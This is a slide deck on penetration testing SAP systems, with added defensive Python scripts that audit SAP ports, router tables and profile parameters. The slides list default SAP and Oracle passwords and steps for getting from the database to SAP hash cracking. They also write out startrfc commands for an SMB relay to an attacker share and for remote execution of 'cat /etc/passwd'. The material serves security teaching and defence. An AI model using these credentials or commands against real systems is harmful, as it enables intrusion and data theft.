Practical SAP Pentesting · 2016-12-30 · Invest in security to secure investments
Invest in security to secure investments
Practical SAP Pentesting
Alexander Polyakov, CTO ERPScan
About ERPScan
• The only 360-degree SAP security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
Introduction to SAP
Business application security
All business processes are generally contained in ERP systems. Any information an attacker, be it a cybercriminal, industrial spy or competitor, might want is stored in a company's ERP. This information can include financial, customer or public relations data, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at a victim's ERP system and can cause significant damage to the business.
Big companies
Diagram of a big company's SAP landscape: Portal, HR, Logistics, Warehouse, ERP, Billing, BI, Industry, CRM and SRM systems, with connections to Suppliers, Customers, Banks, Insurance, Partners and Branches.
SAP
• The most popular business application
• More than 250000 customers worldwide
• 83% of Forbes 500 companies run SAP
• Main system – ERP
• 3 main platforms:
  - NetWeaver ABAP
  - NetWeaver J2EE
  - BusinessObjects
SAP NetWeaver ABAP
• Main platform
• Base platform for: ERP, SRC, CRM, PLM
• Purpose: Automate business processes
• If compromised:
  - Stopping of business processes
  - Fraud
  - Industrial espionage
SAP NetWeaver J2EE
• Additional platform
• Base platform for IT stuff, like: SAP Portal, SAP XI, SAP Solution Manager, SAP Mobile, SAP xMII
• Purpose: Integration of different systems
• If compromised:
  - Stopping of all connected business processes
  - Fraud
  - Industrial espionage
SAP BusinessObjects
• Additional platform
• Base platform for analytics
• Mostly business oriented:
  - Business Intelligence
  - GRC
• If compromised:
  - Fraud
  - Industrial espionage
Introduction to SAP
SAP for users
• Client-server application SAP GUI with the proprietary DIAG protocol
• Main functions – transactions executed in SAPGUI
• Also possible to call special background functions (RFC) remotely
• Possible to modify the code of transactions or RFC functions using the ABAP language
• Possible to use web interfaces like Web Dynpro or BSP in some applications like SRM
SAP for users
• SAP Landscape – Test, Development, Production, QA
• SAP Instance – Server instance, Dialog instance
• Client – Default clients – Client separation
DEMO 0: Login to SAP system.
Introduction to SAP Security
SAP Security
• Complexity. Complexity kills security. Many different vulnerabilities at all levels, from network to application
• Customization. Cannot be installed out of the box. They have much (up to 50%) custom code and business logic
• Risky. Rarely updated, because administrators are scared they can be broken during updates, and updates also mean downtime
• Unknown. Mostly available inside a company (closed world)
http://erpscan.com/wp-content/uploads/pres/Forgotten%20World%20-%20Corporate%20Business%20Application%20Systems%20Whitepaper.pdf
Chart: SAP Security notes published per year, 2001-2014 (y-axis 0 to 900)
By 2014 - 2800 SAP Security notes
SAP Pentesting Features
• Deeper knowledge of ERP than of normal systems is required
• ERP systems are mission critical and cannot be accidentally taken down (PoC exploits are too dangerous)
• Gaining a shell / command execution is not the goal
  – The goal is access to sensitive data or impact on business processes
SAP Pentesting Features: deeper knowledge
• Higher difficulty than standard pen tests
• Required knowledge of:
  – Business processes
  – Business logic
  – Exploit testing impact risk assessment
  – High-end databases
  – Numerous (sometimes esoteric) operating systems
  – Different hardware platforms
  – Common custom implementations
SAP Pentesting Features: Exploitation
• Exploit code for ERP is not easy to develop
• Payloads have to be adapted
  – Numerous hardware, OS, release version and DB systems to generate payloads for
  – In some cases up to 50 different shellcode variations
• Building a test environment is nearly impossible
  – Takes an expert a week to properly install each variation
  – A year to build a comprehensive test environment
SAP Pentesting Features: Shell
• A better approach is required, with focus on:
  – Architecture
  – Business logic
  – Configuration
  – You will get administrator access to business data
• Rather than:
  – Program or memory vulnerabilities
  – You will probably gain access to the OS and then still need to obtain access to the application
SAP Security areas
Diagram: SAP security areas - Code security, Business security (SOD), Infrastructure security (Network, OS, Database) and Application platform security - split by whether a legal user is required or not.
Methodologies: EAS-SEC
• Enterprise Application Security Project
• Founded in 2010
• Published concept and top 10 issues for different areas
• Version 2 in 2004: published compliance for SAP NetWeaver ABAP
  http://erpscan.com/publications/the-sap-netweaver-abap-platform-vulnerability-assessment-guide/
"Exists to provide guidance to people involved in the procurement, design, implementation or sign-off of large scale (i.e. 'Enterprise') applications."
http://www.owasp.org/index.php/OWASP_Enterprise_Application_Security_Project
Network level security
Network Security Agenda
Top 10 Network/Architecture issues by EAS-SEC
1. Lack of proper network filtration between SAP and the corporate network
2. Lack of, or vulnerable, encryption between the corporate network and SAP
3. Lack of separation between TST, DEV and PRD systems
4. Lack of encryption inside the SAP network
5. Insecure trusted relations between components
6. Insecurely configured Internet-facing applications
7. Vulnerable / default configured Gateways
8. Lack of frontend access filtration
9. Lack of, or misconfigured, monitoring IDS/IPS
10. Insecure / inappropriate wireless communication
Network security at a glance
It is mostly about:
• Network filtration (ACL)
• Protocol security (encryption)
• Securing Internet access (SAP Router)
Network filtration
Almost every listed application has vulnerabilities and misconfigurations that can be used to gain access to SAP
http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/4e515a43-0e01-0010-2da1-9bcc452c280b?QuickLink=index&overridelayout=true
DEMO 1: Nmap scan of SAP
Why critical?
• Administrative SAP services can have direct Internet access
• Even if you are sure they do not
• To prove it we ran the "SAP Security in Figures" report
• All of the possible services were found at least once
Myth: attacks on SAP systems are available only to insiders
Why critical?
About 10000 systems, including: Dispatcher, Message server, SapHostcontrol, Web services
Protocol security
| Software | Port | Protocol | Pass encr | Data encr | Mitigation |
|---|---|---|---|---|---|
| SAPGUI | 32<SN> | DIAG | Compression (can be decompressed) | Compression (can be decompressed) | SNC |
| WEBGUI | 80<SN> | HTTP | Base64 | no | SSL |
| RFC | 33<SN> | RFC | XOR | no | SNC |
| Message server | 36<SN> | | No | no | SNC |
| Visual Admin | 5<SN>04 | P4 | Proprietary (broken) | Proprietary (broken) | SSL |
| IIOP | 5<SN>07 | | | | |
| J2EE Telnet | 5<SN>08 | | No | No | VPN/Disable |
| LogViewer | 5<SN>09 | proprietary | md5 | No | NO |
| MMC | 5<SN>13 | HTTP | Base64 | no | SSL |
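The port patterns in the table above (with <SN> the two-digit instance number) let a defender turn a port-scan result into an inventory of exposed SAP services and of the ones whose credentials travel unprotected. The following Python is an added example, not ERPScan's tooling or code from the presentation; the nmap -oG style scan output is constructed, and the service/protection/mitigation mapping is taken from the table.

```python
"""Map scanned ports to SAP services and flag those that need SNC/SSL.

Added example, not part of the original presentation. The scan output below
is constructed; the port templates, password protection and mitigation
columns follow the protocol security table, with <SN> = instance number.
"""
import re

# (service, port template, password protection on the wire, mitigation)
SAP_PORT_TABLE = [
    ("SAPGUI (DIAG)",     "32<SN>",  "compression only",     "SNC"),
    ("RFC",               "33<SN>",  "XOR",                  "SNC"),
    ("Message server",    "36<SN>",  "none",                 "SNC"),
    ("WEBGUI (HTTP)",     "80<SN>",  "Base64",               "SSL"),
    ("Visual Admin (P4)", "5<SN>04", "proprietary (broken)", "SSL"),
    ("IIOP",              "5<SN>07", "unknown",              ""),
    ("J2EE Telnet",       "5<SN>08", "none",                 "VPN/Disable"),
    ("LogViewer",         "5<SN>09", "md5",                  ""),
    ("MMC (HTTP)",        "5<SN>13", "Base64",               "SSL"),
]

# Password protections the table shows as absent or trivially reversible.
WEAK_PROTECTION = {"none", "Base64", "XOR", "compression only", "proprietary (broken)"}

# Constructed nmap greppable (-oG) output for one host; not a real scan.
SAMPLE_SCAN = """# Nmap scan (constructed sample, -oG format)
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 1527/open/tcp//oracle///, 3200/open/tcp//sapgui///, 3300/open/tcp//saprfc///, 3600/open/tcp//msgsrv///, 8000/open/tcp//http///, 50004/open/tcp//p4///, 50008/open/tcp//telnet///, 22/filtered/tcp//ssh///\tIgnored State: closed (992)
# Nmap done (constructed sample)
"""


def _template_to_regex(template):
    # "5<SN>04" -> ^5(\d\d)04$ ; the captured group is the instance number.
    return re.compile("^" + re.escape(template).replace(re.escape("<SN>"), r"(\d\d)") + "$")


def classify_port(port):
    """Return (service, instance_number, protection, mitigation) for a SAP port, else None."""
    for service, template, protection, mitigation in SAP_PORT_TABLE:
        m = _template_to_regex(template).match(str(port))
        if m:
            return service, m.group(1), protection, mitigation
    return None


def parse_nmap_grepable(text):
    """Extract open TCP ports from nmap -oG lines ("Ports: 3200/open/tcp//...")."""
    ports = set()
    for line in text.splitlines():
        m = re.search(r"Ports:\s*(.*)", line)
        if not m:
            continue
        port_field = m.group(1).split("\t")[0]  # drop "Ignored State: ..." suffix
        for entry in port_field.split(","):
            fields = entry.strip().split("/")  # port/state/protocol/owner/service/...
            if len(fields) >= 3 and fields[1] == "open" and fields[2] == "tcp":
                ports.add(int(fields[0]))
    return sorted(ports)


def sap_exposure_report(open_ports):
    """Group recognised SAP services by instance number; needs_fix is True when
    the table lists no real password protection, so the mitigation column
    (SNC/SSL/VPN or disabling the service) applies."""
    report = {}
    for port in open_ports:
        hit = classify_port(port)
        if hit is None:
            continue  # not a SAP port pattern (e.g. the Oracle listener)
        service, sn, protection, mitigation = hit
        needs_fix = protection in WEAK_PROTECTION
        report.setdefault(sn, []).append((port, service, needs_fix, mitigation))
    return report


if __name__ == "__main__":
    for sn, services in sap_exposure_report(parse_nmap_grepable(SAMPLE_SCAN)).items():
        print(f"instance {sn}:")
        for port, service, needs_fix, mitigation in services:
            flag = f"  -> apply {mitigation or 'restriction'}" if needs_fix else ""
            print(f"  {port:>5}  {service}{flag}")
```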
SAP Router security
SAP Router
SAP Router – reverse proxy server:
• Transmits connections
  – From the Internet to the company
  – From SAP AG to the company
  – Between networks
  – Between clients/partners
• Listens by default on port 3299
• Can be installed on Windows/Linux
• Supports encryption (SNC) and ACL
SAP Router bug 1 (Table bypass)
There is an ACL table to prevent unauthorized access:
• D 172.16.0.1 192.168.1.1 22
• P 172.16.0.4 192.168.1.1 3301 passwd
• S 172.16.0.5 192.168.1.1 * passwd
• ...
• KP * 192.168.1.1 8000
• P * * *
SAP Router bug 2 (non SAP services)
• Sometimes administrators also use the SAPRouter for routing other protocols
• It is possible to connect to any port
• In old versions * means any port is allowed
• In new versions * means any SAP port is allowed
• P 172.*.*.* * 3389
• P * * telnet
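The route tables on the two SAP Router slides above (bug 1 and bug 2) can be audited mechanically. The following Python is an added example, not ERPScan's tooling or code from the presentation; it parses a constructed saprouttab modelled on the slide entries, evaluates a connection the way saprouter does (top-down, first matching entry decides) but with simplified shell-style wildcards and no subnet masks, and flags the entries a reviewer should question: the trailing catch-all permit, wildcard ports and non-SAP services.

```python
"""Audit a SAP Router route permission table (saprouttab).

Added example, not part of the original presentation. SAMPLE_ROUTTAB is
constructed from the rule shapes shown on the slides. Host matching is
simplified to shell wildcards (fnmatch); real saprouter also accepts
subnet masks, which are not handled here.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase

# Constructed sample table modelled on the slides' entries.
SAMPLE_ROUTTAB = """
# action  source       destination   port   password
D   172.16.0.1   192.168.1.1   22
P   172.16.0.4   192.168.1.1   3301   passwd
S   172.16.0.5   192.168.1.1   *      passwd
KP  *            192.168.1.1   8000
P   172.*.*.*    *             3389
P   *            *             telnet
P   *            *             *
"""

PERMIT_ACTIONS = {"P", "S", "KP", "KS"}  # S = SAP protocols only; K* = SNC variants
NON_SAP_PORTS = {"3389", "telnet"}       # the non-SAP services from the slide


@dataclass
class Rule:
    action: str
    source: str
    dest: str
    port: str
    password: str = ""
    line_no: int = 0


def parse_routtab(text):
    """Parse saprouttab lines into Rule objects, ignoring comments and blanks."""
    rules = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 4:
            raise ValueError(f"line {n}: expected at least 4 fields, got {line!r}")
        action, src, dst, port = parts[:4]
        password = parts[4] if len(parts) > 4 else ""
        rules.append(Rule(action.upper(), src, dst, port, password, n))
    return rules


def _port_matches(rule_port, port):
    # '*' matches everything; service names such as "telnet" are compared as strings.
    return rule_port == "*" or rule_port == str(port)


def first_match(rules, src, dst, port):
    """Return the first rule matching (src, dst, port); saprouter stops at the first hit."""
    for r in rules:
        if fnmatchcase(src, r.source) and fnmatchcase(dst, r.dest) and _port_matches(r.port, port):
            return r
    return None


def is_permitted(rules, src, dst, port):
    r = first_match(rules, src, dst, port)
    return r is not None and r.action in PERMIT_ACTIONS


def find_weak_rules(rules):
    """Flag permit entries a reviewer should question: a catch-all permit, a
    wildcard port (old saprouter versions read '*' as any port, not any SAP
    port), and routes to non-SAP services."""
    findings = []
    for r in rules:
        if r.action not in PERMIT_ACTIONS:
            continue
        if r.source == "*" and r.dest == "*" and r.port == "*":
            findings.append((r.line_no, "catch-all permit: any host may reach any port"))
        elif r.port == "*":
            findings.append((r.line_no, "wildcard port: any port on old versions, any SAP port on new ones"))
        elif r.port.lower() in NON_SAP_PORTS:
            findings.append((r.line_no, f"non-SAP service {r.port} routed through SAP Router"))
    return findings


if __name__ == "__main__":
    table = parse_routtab(SAMPLE_ROUTTAB)
    for line_no, why in find_weak_rules(table):
        print(f"line {line_no}: {why}")
    print("10.0.0.9 -> 192.168.1.1:22 permitted:", is_permitted(table, "10.0.0.9", "192.168.1.1", 22))
```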
SAP Router bug 3
• Information disclosure of the router table
• If the router is configured with the special parameter -i
• The router table can be remotely disclosed
• In the real world ~20% of routers are configured this way
SAP Router bug 4 (DOS)
• If you found an information disclosure
• Or brute-forced at least one service which can be accessed through the SAP Router
• You can run a DoS attack on the SAP Router
• By default the router pool is limited to 3000 connections
• In 1 minute you can disable the SAPRouter
SAP Router bug 5 (full access)
• Auth bypass
• If the router is configured with the special parameter -x
• The router can be remotely reconfigured
• In the real world ~8% of routers are configured this way!
SAP Router bug 6 (Memory corruption)
• A memory corruption issue was found by the ERPScan team
• Remote compromise without authentication
• Can't disclose details now
• 85% vulnerable NOW!
Database level security for SAP systems
Database Security Agenda
• Critical database data
• Attacking the Database
• From database to SAP
• Securing the Database
Critical database data
• We are interested in data that can help us get into SAP
• Data is stored in tablespace SAPR3 or SAP<SID>
• Interesting tables:
  – USR02 – password hashes
  – SSF_PSE_D – SSO keys
  – RFCDES – passwords for RFC connections
  – ICFSERVLOC – passwords for ICF services
  – REPOSRC – ABAP programs
Attacking Database (OWASP-EAS)
Top 10 OS Issues by OWASP-EAS
1. Default passwords for DB access
2. Lack of DB patch management
3. Unnecessary enabled DB features
4. Lack of password lockout/complexity checks
5. Unencrypted sensitive data transport / data
6. Lack of, or misconfigured, network access control
7. Extensive user and group privileges
8. Lack of, or misconfigured, audit
9. Insecure trust relations
10. Open additional interfaces
(Three of these items are marked "SAP Specific" on the slide.)
Attacking Database (OWASP-EAS)
• Oracle is still the most popular database for SAP
• By default it listens on port 1527
• Common attacks:
  – Default Oracle passwords
  – Simple password brute force
  – Protocol vulnerabilities (overflows)
  – Listener attacks (remote registration of log)
Direct access to Database = full SAP compromise
Default passwords
• Default SAP database users/passwords
  – SAPR3/SAP
• Default Oracle database users/passwords
  – SYS/CHANGE_ON_INSTALL
  – SYSTEM/MANAGER
  – SCOTT/TIGER
  – DBSNMP/DBSNMP
Misconfigured access control
• Oracle configuration parameter REMOTE_OS_AUTHENT
• If set to TRUE, Oracle trusts the remote system connecting to the listener
• The remote user must have the name <SID>ADM
• No need for a password or anything else!
From database to SAP
• Connect using OPS$<SID>ADM
• Select the encrypted password from the SAPUSER table
• Decrypt it (DES with the known key BE_HAPPY)
• Connect to SAP using user SAPR3/SAPSR3/SAPSR3DB
• Select user hashes from the SAP<SID>.usr02 table
• Brute-force the hashes using JohnTheRipper
Oracle Security Defense
• Close port 1527 from everything but SAP
• Secure the listener with a password
• Configure password policies:
  – FAILED_LOGIN_ATTEMPTS
  – PASSWORD_VERIFY_FUNCTION
• Change default passwords
• Encrypt data transfer
• Enable SQL Audit at the DB
SAP Application platform security
SAP NetWeaver
SAP Frontend security
Why attack users
• Users are less secure
• There are thousands of SAP users in one company
• You can attack them even if the server is fully secured
• You can attack them from outside
• You can use them as a proxy for attacking servers
Typical Client Software for SAP
• SAPGUI
• JAVAGUI
• WEBGUI
• NWBC
• RFC
• Applications such as VisualAdmin, Mobile client and many, many others
Typical Client Software for SAP

| Date | Vulnerable Component | Author | Vulnerability | Link |
|---|---|---|---|---|
| 04.01.2007 | Rfcguisink | Mark Litchfield | BOF | http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-enjoysap-stack-overflow/ |
| 04.01.2007 | Kwedit | Mark Litchfield | BOF | http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-enjoysap-stack-overflow/ |
| 07.11.2008 | Mdrmsap | Will Dormann | BOF | http://www.securityfocus.com/bid/32186/info |
| 07.01.2009 | Sizerone | Carsten Eiram | BOF | http://www.securityfocus.com/bid/33148/info |
| 31.03.2009 | WebWiewer3D | Will Dormann | BOF | http://www.securityfocus.com/bid/34310/info |
| 15.04.2009 | Kwedit | Carsten Eiram | Insecure Method | http://secunia.com/secunia_research/2008-56/ |
| 08.06.2009 | Sapirrfc | Alexander Polyakov (DSecRG) | BOF | http://dsecrg.com/pages/vul/show.php?id=115 |
| 28.09.2009 | WebWiewer3D | Alexander Polyakov (DSecRG) | Insecure Method | http://dsecrg.com/pages/vul/show.php?id=143 |
| 28.09.2009 | WebWiewer2D | Alexander Polyakov (DSecRG) | Insecure Method | http://dsecrg.com/pages/vul/show.php?id=144 |
| 07.10.2009 | VxFlexgrid | Elazar Broad, Alexander Polyakov (DSecRG) | BOF | http://dsecrg.com/pages/vul/show.php?id=117 |
| 23.03.2010 | BExGlobal | Alexey Sintsov (DSecRG) | Insecure Method | http://dsecrg.com/pages/vul/show.php?id=164 |
| unpublished | Kwedit | Alexander Polyakov, Alexey Troshichev (DSecRG) | Insecure Method | http://dsecrg.com/pages/vul/show.php?id=145 |
| 14.12.2010 | RFCSDK | Alexey Sintsov (DSecRG) | Memory Corruption | http://dsecrg.com/pages/vul/show.php?id=169 |
| 14.12.2010 | RFCSDK | Alexey Sintsov (DSecRG) | Format String | http://dsecrg.com/pages/vul/show.php?id=170 |
| unpublished | DSECRG-00173 | Alexander Polyakov (DSecRG) | Insecure Method | later |
| 22.12.2010 | NWBC | Alexey Sintsov (DSecRG) | Memory Corruption | http://dsecrg.com/pages/vul/show.php?id=210 |
Implementation fails
• Distributives are usually stored on a shared folder
• If you can gain this access it is possible to overwrite DLLs
• Or modify configuration files with BOF issues
• Or overwrite configuration files with a fake SAP server
SAP NetWeaver – Application server services
SAP NetWeaver: main components
• NetWeaver Application Server ABAP
  – SAP Gateway
  – SAP Message server
  – SAP Message server HTTP
  – SAP Dispatcher
  – SAP ICM
  – SAP MMC
  – SAP HostControl
• NetWeaver Application Server JAVA
  – HTTP Server
  – SAP Portal
SAP Gateway security
SAP Gateway
SAP Gateway is also called Application Server.
• One of the core SAP services
• Allows interaction with remote SAP systems and also with other systems
• Manages the communication for all RFC-based functionality:
  – Gateway monitor (Administration)
  – Gateway Reader (RFC)
  – Gateway work process (logging)
http://scn.sap.com/people/matt.kangas/blog/2009/03/03/sap-netweaver-executables
Gateway Monitor
• Gateway Monitor: access for analyzing the gateway process
• You can specify 3 options for security:
  – gw/monitor=0: access forbidden
  – gw/monitor=1: only local access (default now)
  – gw/monitor=2: local and remote access (default before 6.2)
Gateway Monitor
• If gw/monitor=2 it is possible to run critical commands and obtain some information remotely
• Remote monitoring can be done with the GWMON tool
• Stored in /usr/exe/
• Example: gwmon -gwhost 127.0.0.1 -gwserv 3200
DEMO 9: Playing with GWMON
Gateway RFC (3 types)
• ABAP RFC – client call SAP-‐server
• Registered RFC Server Program – Client call addiAonal programs installed on Other servers via Gateway
• Started RFC Server Program
– Client call addiAonal programs that installed on SAP-‐server
65
ABAP RFC - overview
• The most commonly used type
• Comparable to Windows RPC
• A user can call ABAP remote-enabled function modules
• The caller needs to know: system ID, client, user ID, password
• There are about 30,000 different RFC functions in different groups
ABAP RFC - executing
How to call an RFC function remotely?
• Use the default tool \usr\sap\ERP\SYS\exe\run\startrfc
• Use default credentials or existing user credentials
Example:
    startrfc -3 -h 172.16.0.222 -s 01 -c 800 -F RFC_PING -t
Keep the parameters in this order, otherwise you will get errors!
ABAP RFC – anonymous RFCs
• Check whether a function can be accessed anonymously; some functions can be executed without credentials:
– RFC_PING – just checks the connection
– RFC_SYSTEM_INFO
– RFC_GET_LOCAL_DESTINATIONS
– RFC_GET_LOCAL_SERVERS
– SYSTEM_INVISIBLE_GUI
DEMO 10: ABAP RFC – information disclosure issues
Default credentials
They can be used to run RFC functions remotely.

| USER | PASSWORD | CLIENT |
|---|---|---|
| SAP* | 06071992, PASS | 000, 001, 066, custom |
| DDIC | 19920706 | 000, 001, custom |
| TMSADM | PASSWORD, $1Pawd2& | 000 |
| SAPCPIC | ADMIN | 000, 001 |
| EARLYWATCH | SUPPORT | 066 |
DEMO 11: ABAP RFC – user creation
ABAP RFC attacks (SMB relay)
• EPS_DELETE_FILE – no additional authorization checks inside!
• EPS_CLOSE_FILE
• CLBA_CLASSIF_FILE_REMOTE_HOST
• CLBA_UPDATE_FILE_REMOTE_HOST
• EDI_DATA_INCOMING
• RZL_READ_FILE
• 50 more...
These file-handling function modules open whatever path they are given on the server side; pointing them at a UNC path makes the SAP server's OS account authenticate to an attacker-controlled SMB share, which is the relay the title refers to.
Example:
    startrfc -3 -h 172.16.0.222 -s 01 -t -F EDI_DATA_INCOMING -E PATHNAME=\\172.16.0.101\ERPScan\ -E PORT=SAPID3 -u SAPCPIC -p admin
ABAP RFC attacks (command execution)
• SXPG_CALL_SYSTEM / SXPG_COMMAND_EXECUTE (any command, using a vulnerability)
Example:
    startrfc -3 -h 172.16.0.222 -s 01 -F SXPG_COMMAND_EXECUTE -E COMMANDNAME=TYPE -E ADDITIONAL_PARAMETERS="cat /etc/passwd" -u SAPCPIC -p admin
DEMO 12: ABAP RFC – remote command execution
Gateway defense
• Secure gw/monitor
• Enable the secinfo and reginfo ACLs (don't use *)
• Apply the patches for the latest RFC security bypasses and set gw/reg_no_conn_info
• Restrict access to dangerous RFC functions
• Enable gw/logging
SAP Message Server security

SAP NetWeaver architecture (diagram)
SAP Message Server - overview
• The SAP message server provides two services:
– it manages communication between the application servers of one SAP system
– it provides load-balancing information to clients such as SAP GUI
• Before 7.0 it listened on one port for both services
• Since 7.0 default installations automatically split them into:
– an internal port (used for application server connections)
– an external port (used for user connections)
• This is defined via profile parameters:
– rdisp/mshost – host
– rdisp/msserv – port
– rdisp/msserv_internal – must be != 0
SAP Message Server - attacks
Why should we use 2 ports for the SAP message server?
• An attacker can register a fake application server on the message server
• By default this is possible without authentication
• He can then perform a MITM and sniff client connections
SAP Message Server - ACL
• Even if you restrict access to the message server from GUI clients, application servers can still access it
• ms/acl_info can be used to list the approved application servers
• The entries must have the following syntax:
    HOST=[* | ip_adr | host_name | subnet_mask | domain][, ...]
Examples of valid entries:
    HOST=*              (all hosts are allowed)
    HOST=host1,host2    (logons allowed from host1 and host2)
    HOST=*.sap.com      (all hosts in the sap.com domain can log on)
    HOST=147.45.56.32   (the host with this IP address can log on)
    HOST=147.45.56.*    (hosts in this subnet can log on)
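An added example, not part of the original deck, that parses a constructed ms/acl_info file in the syntax above and evaluates whether a given peer would be admitted, then points out the entries that weaken the ACL. The wildcard semantics (prefix match on dotted octets, suffix match on the reverse-resolved host name) are this example's reading of the documented entries, not SAP's code; the sample file is constructed.

```python
import re

# Constructed ms/acl_info file in the syntax quoted above (not taken from any real system).
SAMPLE_ACL_INFO = """\
# Application servers allowed to log on to the message server
HOST=appsrv1,appsrv2
HOST=*.sap.com
HOST=147.45.56.32
HOST=10.1.2.*
"""


def parse_acl_info(text):
    """Return the HOST patterns from an ms/acl_info file; comments and blank lines are skipped."""
    patterns = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"HOST\s*=\s*(.+)$", line, re.IGNORECASE)
        if not m:
            raise ValueError("unparseable ms/acl_info line: %r" % raw)
        patterns.extend(p.strip() for p in m.group(1).split(",") if p.strip())
    return patterns


def _is_ip_like(pattern):
    return re.fullmatch(r"[0-9*.]+", pattern) is not None


def host_matches(pattern, ip, hostname=None):
    """Match one pattern against a peer's IP and (reverse-resolved) host name.

    Assumed semantics: '*' alone matches any host; '147.45.56.*' is a prefix match on the
    dotted quad; '*.sap.com' is a suffix match on the host name; anything else is exact.
    """
    if pattern == "*":
        return True
    if _is_ip_like(pattern):
        if "*" in pattern:
            return ip.startswith(pattern.split("*", 1)[0])
        return ip == pattern
    if hostname is None:  # name-based entry but no name known for this peer
        return False
    if pattern.startswith("*."):
        return hostname.lower().endswith(pattern[1:].lower())
    return hostname.lower() == pattern.lower()


def acl_allows(patterns, ip, hostname=None):
    """True if any entry admits the peer (the ACL is a whitelist: first match wins)."""
    return any(host_matches(p, ip, hostname) for p in patterns)


def acl_weaknesses(patterns):
    """Entries a reviewer would flag: wildcards widen who may register as an application server."""
    findings = []
    for p in patterns:
        if p == "*":
            findings.append("HOST=* lets any host register as an application server")
        elif p.startswith("*."):
            findings.append("domain wildcard %s trusts reverse DNS, which a network attacker may influence" % p)
        elif _is_ip_like(p) and "*" in p:
            findings.append("subnet wildcard %s admits every host in that range" % p)
    return findings
```

Run it against the sample and the two wildcard entries are reported; the exact IP and host names are admitted only when they match precisely.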
Message Server monitoring
• Message server monitoring can remotely get information about the message server:
– check and change all the important settings
– create and view traces
– read statistics
• Managed by the ms/monitor option
• If ms/monitor = 1 and ms/admin_port != 0, anybody can get remote access by using the msmon tool
http://help.sap.com/saphelp_nw04/helpdata/EN/64/3e7�4a12e49b9856bb97970c6acc1/frameset.htm
DEMO 15: Playing with MSMON
Message server - defense
• Disable ms/monitor
• Enable ms/acl_info and manage the ACL
• Enable ms/admin_port
http://help.sap.com/saphelp_nw04/helpdata/en/40/c235c15ab7468bb31599cc759179ef/frameset.htm
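An added example (not from the slides or ERPScan's tooling) that turns the gateway defense list and the message server defense list above into one automated profile check. It parses a constructed instance profile carrying the weak settings the slides warn about, flags them, and passes a hardened copy. The parameter names are SAP's; the rules, defaults assumed for absent parameters, and the sample profile are this example's assumptions.

```python
# Constructed instance profile excerpt (not from a real system) with the weak settings
# discussed in the gateway and message server slides.
SAMPLE_PROFILE = """\
SAPSYSTEMNAME = ERP
INSTANCE_NAME = DVEBMGS00
rdisp/mshost = erpms01
rdisp/msserv = sapmsERP
# rdisp/msserv_internal not set: GUI clients and application servers share one port
gw/monitor = 2
gw/sec_info = /usr/sap/ERP/DVEBMGS00/data/secinfo
gw/logging = ACTION=Ss LOGFILE=gw_log-%y-%m-%d SWITCHTF=day
ms/monitor = 1
ms/admin_port = 3901
"""

# Same profile with every finding fixed (assumed paths), used to show a clean run.
SAMPLE_PROFILE_HARDENED = SAMPLE_PROFILE.replace("gw/monitor = 2", "gw/monitor = 1") + """\
gw/reg_info = /usr/sap/ERP/DVEBMGS00/data/reginfo
rdisp/msserv_internal = 3900
ms/acl_info = /usr/sap/ERP/DVEBMGS00/data/ms_acl_info
ms/monitor = 0
"""


def parse_profile(text):
    """Parse 'name = value' lines of a SAP profile into a dict; '#' comments and blanks ignored."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        name, value = line.split("=", 1)
        params[name.strip()] = value.strip()
    return params


def audit_profile(params):
    """Return (parameter, finding) pairs for the hardening points on the two defense slides.

    Assumed defaults when a parameter is absent: gw/monitor=1, ms/monitor=0,
    rdisp/msserv_internal=0, ms/admin_port=0 (this example's reading, not SAP's kernel).
    """
    findings = []
    get = params.get
    if get("gw/monitor", "1") == "2":
        findings.append(("gw/monitor", "remote gateway monitoring allowed (gwmon); set 0 or 1"))
    for param, name in (("gw/sec_info", "secinfo"), ("gw/reg_info", "reginfo")):
        if not get(param):
            findings.append((param, "%s ACL not configured; RFC server start/registration unrestricted" % name))
    if not get("gw/logging"):
        findings.append(("gw/logging", "gateway logging disabled"))
    if get("rdisp/msserv_internal", "0") == "0":
        findings.append(("rdisp/msserv_internal", "no internal port; application servers and GUI clients share one port"))
    if not get("ms/acl_info"):
        findings.append(("ms/acl_info", "no application server ACL; any host may register as an application server"))
    if get("ms/monitor", "0") == "1" and get("ms/admin_port", "0") != "0":
        findings.append(("ms/monitor", "external monitoring via msmon enabled"))
    return findings


if __name__ == "__main__":
    for param, text in audit_profile(parse_profile(SAMPLE_PROFILE)):
        print("%-24s %s" % (param, text))
```

The same checks can be run from an ABAP system with RSPARAM output or from the profile files under /usr/sap/&lt;SID&gt;/SYS/profile; the parser only needs the `name = value` lines.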
SAP Message Server HTTP

Message server HTTP - info
• The message server HTTP service is just a simple HTTP service serving information
• There is no need to have this service exposed
• Information disclosure vulnerabilities exist:
– read details about connected instances
– read SAP parameters
DEMO 16: Message Server HTTP – parameter disclosure
SAP NetWeaver ICM Security

SAP NetWeaver architecture (diagram)
Agenda
• History of SAP web applications and ITS
• ITS vulnerabilities
• ICM architecture
• ICM vulnerabilities
• ICM defense
ICM (critical services)
More than 1,500 services can execute critical functionality
• Every registered user can get access to them by default
– Most services require authentication
– You can use any of the default accounts to attack
– By default ICF services are not assigned to any authorization value
– ANY user can execute any ICF service (if there are no additional authorization checks in the code)
– There are many critical services which an unprivileged user can use to escalate privileges
• There are also about 40 anonymous services (transaction SICF)
ICM (list of critical services)
Some examples of ICF services:
• /sap/public/info – anonymous information about the system
• /sap/public/icf_info/icr_groups – installed applications
• /sap/bc/soap/rfc – remote RFC calls
• /sap/bc/srt/xip/sap – critical XI functions
• /sap/bw/Bex – reading InfoObjects remotely
• /sap/bc/bsp/sap/htmlb_samples – test service with vulnerabilities
• /sap/bc/gui/sap/its/webgui – WebGUI access
ICM (critical services)
• Service /sap/public/info – anonymous information about the system
• Can be called anonymously, without any user rights

